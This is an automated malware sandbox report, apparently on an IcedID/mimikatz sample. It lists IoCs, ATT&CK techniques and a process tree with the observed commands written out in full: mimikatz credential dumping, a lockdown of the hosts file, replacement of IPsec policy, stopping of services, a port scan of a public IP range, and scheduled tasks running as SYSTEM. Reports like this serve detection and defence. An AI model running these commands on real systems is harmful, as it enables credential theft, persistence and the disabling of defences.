Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	glithlcwh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	euiugba.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lqvjma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3848	cmd.exe
3608	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x00080000000234dc-6.dat	nsis_installer_2
behavioral2/files/0x00080000000234ee-15.dat	nsis_installer_1
behavioral2/files/0x00080000000234ee-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	euiugba.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	euiugba.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	euiugba.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	euiugba.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	euiugba.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	euiugba.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	wewhpbpmh.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	euiugba.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	euiugba.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	euiugba.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3608	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3984	schtasks.exe
4020	schtasks.exe
3132	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
3268	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	3268	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2452	euiugba.exe
Token: SeDebugPrivilege	3648	euiugba.exe
Token: SeDebugPrivilege	3312	vfshost.exe
Token: SeDebugPrivilege	4200	wewhpbpmh.exe
Token: SeLockMemoryPrivilege	4804	pctkcm.exe
Token: SeLockMemoryPrivilege	4804	pctkcm.exe
Token: SeDebugPrivilege	1292	wewhpbpmh.exe
Token: SeDebugPrivilege	4124	wewhpbpmh.exe
Token: SeDebugPrivilege	3980	wewhpbpmh.exe
Token: SeDebugPrivilege	3936	wewhpbpmh.exe
Token: SeDebugPrivilege	4236	wewhpbpmh.exe
Token: SeDebugPrivilege	1948	wewhpbpmh.exe
Token: SeDebugPrivilege	3808	wewhpbpmh.exe
Token: SeDebugPrivilege	5108	wewhpbpmh.exe
Token: SeDebugPrivilege	3600	wewhpbpmh.exe
Token: SeDebugPrivilege	224	wewhpbpmh.exe
Token: SeDebugPrivilege	3468	wewhpbpmh.exe
Token: SeDebugPrivilege	3844	wewhpbpmh.exe
Token: SeDebugPrivilege	2032	wewhpbpmh.exe
Token: SeDebugPrivilege	1756	wewhpbpmh.exe
Token: SeDebugPrivilege	3248	wewhpbpmh.exe
Token: SeDebugPrivilege	1560	wewhpbpmh.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3268	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe
3268	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe
2452	euiugba.exe
2452	euiugba.exe
3648	euiugba.exe
3648	euiugba.exe
1232	xohudmc.exe
3756	lqvjma.exe
4900	euiugba.exe
4900	euiugba.exe
1248	euiugba.exe
1248	euiugba.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3268 wrote to memory of 3848	3268	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe	84
PID 3268 wrote to memory of 3848	3268	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe	84
PID 3268 wrote to memory of 3848	3268	2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe	84
PID 3848 wrote to memory of 3608	3848	cmd.exe	86
PID 3848 wrote to memory of 3608	3848	cmd.exe	86
PID 3848 wrote to memory of 3608	3848	cmd.exe	86
PID 3848 wrote to memory of 2452	3848	cmd.exe	90
PID 3848 wrote to memory of 2452	3848	cmd.exe	90
PID 3848 wrote to memory of 2452	3848	cmd.exe	90
PID 3648 wrote to memory of 4164	3648	euiugba.exe	92
PID 3648 wrote to memory of 4164	3648	euiugba.exe	92
PID 3648 wrote to memory of 4164	3648	euiugba.exe	92
PID 4164 wrote to memory of 2912	4164	cmd.exe	94
PID 4164 wrote to memory of 2912	4164	cmd.exe	94
PID 4164 wrote to memory of 2912	4164	cmd.exe	94
PID 4164 wrote to memory of 4676	4164	cmd.exe	95
PID 4164 wrote to memory of 4676	4164	cmd.exe	95
PID 4164 wrote to memory of 4676	4164	cmd.exe	95
PID 4164 wrote to memory of 2076	4164	cmd.exe	96
PID 4164 wrote to memory of 2076	4164	cmd.exe	96
PID 4164 wrote to memory of 2076	4164	cmd.exe	96
PID 4164 wrote to memory of 3176	4164	cmd.exe	97
PID 4164 wrote to memory of 3176	4164	cmd.exe	97
PID 4164 wrote to memory of 3176	4164	cmd.exe	97
PID 4164 wrote to memory of 1404	4164	cmd.exe	98
PID 4164 wrote to memory of 1404	4164	cmd.exe	98
PID 4164 wrote to memory of 1404	4164	cmd.exe	98
PID 4164 wrote to memory of 2372	4164	cmd.exe	99
PID 4164 wrote to memory of 2372	4164	cmd.exe	99
PID 4164 wrote to memory of 2372	4164	cmd.exe	99
PID 3648 wrote to memory of 1332	3648	euiugba.exe	107
PID 3648 wrote to memory of 1332	3648	euiugba.exe	107
PID 3648 wrote to memory of 1332	3648	euiugba.exe	107
PID 3648 wrote to memory of 3664	3648	euiugba.exe	109
PID 3648 wrote to memory of 3664	3648	euiugba.exe	109
PID 3648 wrote to memory of 3664	3648	euiugba.exe	109
PID 3648 wrote to memory of 4992	3648	euiugba.exe	111
PID 3648 wrote to memory of 4992	3648	euiugba.exe	111
PID 3648 wrote to memory of 4992	3648	euiugba.exe	111
PID 3648 wrote to memory of 1900	3648	euiugba.exe	114
PID 3648 wrote to memory of 1900	3648	euiugba.exe	114
PID 3648 wrote to memory of 1900	3648	euiugba.exe	114
PID 1900 wrote to memory of 2780	1900	cmd.exe	116
PID 1900 wrote to memory of 2780	1900	cmd.exe	116
PID 1900 wrote to memory of 2780	1900	cmd.exe	116
PID 2780 wrote to memory of 2376	2780	wpcap.exe	117
PID 2780 wrote to memory of 2376	2780	wpcap.exe	117
PID 2780 wrote to memory of 2376	2780	wpcap.exe	117
PID 2376 wrote to memory of 4940	2376	net.exe	119
PID 2376 wrote to memory of 4940	2376	net.exe	119
PID 2376 wrote to memory of 4940	2376	net.exe	119
PID 2780 wrote to memory of 2220	2780	wpcap.exe	120
PID 2780 wrote to memory of 2220	2780	wpcap.exe	120
PID 2780 wrote to memory of 2220	2780	wpcap.exe	120
PID 2220 wrote to memory of 4988	2220	net.exe	122
PID 2220 wrote to memory of 4988	2220	net.exe	122
PID 2220 wrote to memory of 4988	2220	net.exe	122
PID 2780 wrote to memory of 1492	2780	wpcap.exe	123
PID 2780 wrote to memory of 1492	2780	wpcap.exe	123
PID 2780 wrote to memory of 1492	2780	wpcap.exe	123
PID 1492 wrote to memory of 2532	1492	net.exe	125
PID 1492 wrote to memory of 2532	1492	net.exe	125
PID 1492 wrote to memory of 2532	1492	net.exe	125
PID 2780 wrote to memory of 4888	2780	wpcap.exe	126

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2164
- C:\Windows\TEMP\tzgyhthhu\pctkcm.exe
  "C:\Windows\TEMP\tzgyhthhu\pctkcm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4804

C:\Users\Admin\AppData\Local\Temp\2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-08_b584df01fa55d56c1e3fd4eb3dff7e27_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gezmcuhh\euiugba.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3848
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3608
- - C:\Windows\gezmcuhh\euiugba.exe
    C:\Windows\gezmcuhh\euiugba.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2452

C:\Windows\gezmcuhh\euiugba.exe
C:\Windows\gezmcuhh\euiugba.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2912
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2076
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:3176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2372
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1332
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3664
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe
    C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2376
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:4940
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4988
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1492
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2532
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4888
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3848
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:2776
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:3796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3176
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\thgpqiiyn\zymuetvrm\Scant.txt
  2⤵
  PID:2104
- - C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe
    C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\thgpqiiyn\zymuetvrm\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\thgpqiiyn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\thgpqiiyn\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:2880
- - C:\Windows\thgpqiiyn\Corporate\vfshost.exe
    C:\Windows\thgpqiiyn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pazzgwtck" /ru system /tr "cmd /c C:\Windows\ime\euiugba.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "pazzgwtck" /ru system /tr "cmd /c C:\Windows\ime\euiugba.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzmeguupv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F"
  2⤵
